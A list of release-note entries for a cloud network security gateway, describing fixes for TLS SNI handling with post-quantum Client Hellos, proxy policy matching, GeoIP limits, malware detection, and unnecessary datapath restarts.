-
Fixes an occasional datapath instability when processing client traffic where post-quantum cryptography is enabled. The instability
would result in a datapath self-heal. The fix ensures datapath stability, resulting in no need to self-heal.
-
Fixes a downstream issue related to obtaining the SNI when a browser-based client has post-quantum cryptography enabled. The
post-quantum cryptography scenario causes the TLS hello to be fragmented into multiple packets. If the first packet arrives,
but the second packet does not, the Gateway would never release the session-allocated CPU upon session cleanup. This fix ensures
that the CPU is released and does not build up over time.
-
Fixes an issue with establishing a full end-to-end session for legacy applications when using a TCP Forward Proxy Policy.
Examples of legacy applications could include SSHv1 and database management traffic (Oracle). For these types of applications,
after the TCP connection is established, the next packet will arrive from the server, not the client. In a TCP Forward Proxy
Policy, the Gateway first establishes the frontend TCP connection (client to Gateway) and expects the next packet to arrive
from the client, not the server. Since no packet ever arrives, the backend TCP connection (Gateway to server) is never established.
This results in no end-to-end session and the application communication will fail.
This fix addresses the issue in the following two ways: (1) enabling a gateway setting and (2) evaluating the Policy Rule
that is processing the traffic to determine if a domain evaluation (FQDN Match, FQDN Filtering) is configured. If both (1)
and (2) are configured, the gateway will assume the traffic will be TLS encrypted and the next packet to arrive will be the
TLS Hello from the client. If just (1) is configured, the gateway will assume the traffic is not TLS encrypted, therefore
it will not expect the next packet to arrive from the client, and will immediately establish the backend connection. The next
packet to arrive, whether from the client or server, will have a full end-to-end session to process and send the packet to
its intended destination.
In the scenario where (1) is not configured, when the traffic is TLS encrypted and a domain is obtained from the TLS Hello
SNI, the gateway will do a domain resolution and use one of the resolved IPs as the destination for the backend connection.
In the scenario where (1) is configured, or a scenario where traffic is not TLS encrypted, the frontend TCP connection destination
IP will be used as the backend TCP connection destination IP since no domain can be obtained and no domain resolution is possible.
In order to employ this fix, a gateway setting is required. If you feel you're running into this issue, please contact Cisco
Support to evaluate and obtain information on how this setting can be enabled. In a future release, this behavior will be
configurable on a per-rule basis, such that a rule can be created to segment this type of traffic, where the change described
above can apply only to specific traffic.
-
Fixes an issue with a Group Address Object exclusion list where the IPs/CIDRs specified in the excluded Address Objects were
not properly applied to the gateway policy. This ensures that both the included and excluded Address Objects are applied for
proper traffic matching.
-
Fixes an issue where a gateway in GCP could bounce between healthy and unhealthy due to Health Check Service failing, potentially
resulting in instance replacement.
-
Fixes an issue where some long-lived active connections would not be properly reset (TCP RST) during gateway replacement,
policy change or timeout expiry.
-
Fixes an issue related to new Talos Rulesets where a Ruleset change could cause issues with applying the new Rulesets to the
gateway. The gateway will become stuck in Policy Ruleset Status "Updating..." state. This issue was caught prior to new Talos
Rulesets being published. The issue is resolved with this update such that new Talos Rulesets can be successfully applied.
-
Fixes an issue where traffic processing on an Ingress Gateway could cause high CPU resulting in an unnecessary auto-scale.
The high CPU is a result of moving from a policy that initially processes a connection using an unencrypted HTTP proxy and
then moving to an encrypted TCP proxy due to an HTTP redirection.
-
Fixes an issue related to a UDP connection pool leak caused by specific UDP session behavior that could eventually result
in a datapath restart. When the datapath restart occurs, the instance will be unhealthy for the duration of the restart. If
that unhealthy period is long enough, the Controller will mark the instance for replacement.
-
Fixes an issue where an Egress Gateway Forward Proxy policy could get stuck in attempting to match traffic to the proper Policy
Rule.
-
Fixes an issue where a gateway could unnecessarily consume CPU in a proxy scenario where the backend connection is unresponsive
causing delays in processing traffic.
-
Fixes a gateway crash that is caused by detection of malware in an Ingress Gateway reverse proxy policy.
-
Fixes an issue where a TLS session that contains Kyber cipher suites could cause increased CPU usage resulting in the inability
to process traffic.
-
Fixes a stability issue where the Gateway datapath could self-heal when proxied sessions are actively terminated during policy
change or gateway instance replacement.
-
Fixes an issue where the generation of a Diagnostic Bundle could fail.
-
Fixes an issue where a Forwarding SNAT Policy could not retrieve the Service Name Indication (SNI) from a TLS Client Hello
message causing the Gateway to close the connection with a TCP RST. This is caused by a change made in Chrome in April 2024
to shift to Post-Quantum Cryptography. With this change, the Client Hello is larger than 1415 bytes, which can result in an
inability to retrieve the SNI, which is used by the policy to match or filter by domain. The fix ensures the Forwarding SNAT
Policy can support Client Hello sizes greater than 1415 bytes.
-
Fixes an issue where a proxy policy could not retrieve the SNI from a TLS Client Hello message causing the Gateway to close
the connection with a TCP RST. This is caused by a change made in Chrome in April 2024 to shift to Post-Quantum Cryptography.
With this change, the Client Hello is larger than 1415 bytes, which can result in an inability to retrieve the Server Name
Indication (SNI), which is used by the proxy to determine what certificate to issue. The fix ensures the proxy policy can
support Client Hello sizes greater than 1415 bytes.
-
Fixes an issue where a change to DNS for a domain used in an FQDN-based Address Object would be received by the gateway datapath
agent, but not applied to the datapath workers. This would result in the DNS change not being applied to the dynamic nature
of the Address Object, impacting proper traffic processing.
-
Fixes issues in the Anti-Malware engine where known malware was not being detected and blocked. The fix includes updating
the anti-malware engine.
-
Fixes an issue where properly detecting malware signatures could occur intermittently.
-
Fixes an issue where the gateway-side cipher suites used in a Gateway SSH session were potentially flagged as weaker cipher
suites. The fix accommodates only the most secure GCM-based cipher suites.
-
Fixes an issue where a Decryption Profile that is configured differently than the default configuration would not properly
apply to the gateway, resulting in TLS negotiation failures due to cipher suite mismatches between the client and the gateway.
-
Fixes the recording of Stats related to Active Connections and Connection Rate where UDP sessions were not being properly
counted.
-
Fixes and issue where the Gateway will self-heal if an empty FQDN/URL Filtering Profile is assigned to the Policy Rule Set
rule.
-
Fixes a deny Rule Action issue related to the use of domains as a 6-tuple match. If the first Rule match is a 6-tuple match
(includes an assigned FQDN Match Profile) and the Policy Action is set to Deny, the Deny action will be based on the 5-tuple
match and will not include the domain for match consideration. This fix ensures that all 6-tuples are considered when evaluating
the Rule and its action. If the traffic does not match the Rule based on the 6-tuple match, then it will refine its match
to a subsequent Rule and take action based on the matched Rule's configuration.
-
Fixes an issue where an Azure Ingress Gateway can get stuck in Health Checking Pending state after a policy update is applied.
This issue also includes new gateway deployments.
-
Fixes an issue related to the use of GeoIP. Countries with many providers have a very large number of advertised prefixes.
When those country codes are used in a GeoIP Address Group, the Address Group will contain a large number of CIDR blocks.
The GeoIP Address Group was restricted to 64,000 CIDRs where exceeding this limit would result in a partial set of CIDRs applied
to the policy. This fix relaxes the limit to ensure the full set of CIDRs will be applied to the policy. It is recommended
to use an 8-core instance type due to the additional memory requirements imposed by GeoIP.
-
Fixes an issue where an Egress Policy Rule Set that uses a decryption-based Forward Proxy (TLS, HTTPS, WebsocketS) is initially
matching on 5-tuple and retrieving the domain from the SNI, but not performing a match refinement based on the 6th tuple resulting
in a TLS error. The fix ensures that 6-tuple match refinement occurs such that the traffic can be successfully processed by
the proper decryption rule.
-
Fixes an issue where sessions with TLS negotiation errors were not recording the SNI as a Traffic Summary -> Event.
-
Fixes an Allow Rule match issue related to the use of domains as a 6-tuple match. If the first Rule match is a 6-tuple match
(includes an assigned FQDN Match Profile), the Policy Action is set to Allow and there are no subsequent rules that are consistent
with the 5-tuple match of the first rule, then all domains will be allowed and domains will be denied. This fix ensures that
only the domains that are matched in the rule will be allowed and all other domains will be denied.
-
Fixes an issue where a TCP reset was not being sent for traffic processed by a Forward policy with a Deny action that uses
an FQDN Match Profile when Reset on Deny is enabled.
-
Fixes an issue where multiple SNI events were being recorded for each Forward Proxy full decrypted session.
-
Fixes an issue where the Address Group size could be exceeded, causing all IPs/CIDRs in excess of the size to not be included
in the Address Group. The Address Group size has been increased to 20,000 IPs/CIDRs.
-
Adds a System Log message if the GeoIP limitations of the gateway are exceeded.
-
Fixes an issue where the wrong action would be taken for URL Filtering Category matching if a timeout occurs when attempting
to retrieve the URL Filtering Category, if the URL is not found in the cache.
-
Updating gateway libraries to address various CVEs.
-
Fixes various issues related to update of private key for certificates when the certificate is configured to access the private
key from a CSP service like Key Vault, Secrets Manager and KMS. This fix ensures that any update to the resource in the CSP
service is detected by the gateway for the gateway to retrieve the update and during traffic processing.
-
Ensures that a user with administrator access to configure a URL Filtering Profile cannot use the custom URL response to inject
Javascript. The fix enforces HTML encoding in the custom URL response.
-
Fixes an issue where changing the PCAP for a Web Protection (WAF) or Network Intrusion (IDS/IPS) Profile would unnecessarily
trigger a blue/green datapath replacement.
-
Fixes an issue where enabling or disabling PCAP in a Network Intrusion (IDS/IPS) Profile would unnecessarily trigger a blue/green
datapath restart.
-
Fixes an issue where enabling or disabling SNAT in a Forwarding Service Object would unnecessarily trigger a blue/green datapath
restart.
-
Fixes an issue where changing the name of an Advanced Security Profile (WAF, IDS/IPS, Anti-Malware, etc.) would unnecessarily
trigger a blue/green datapath replacement.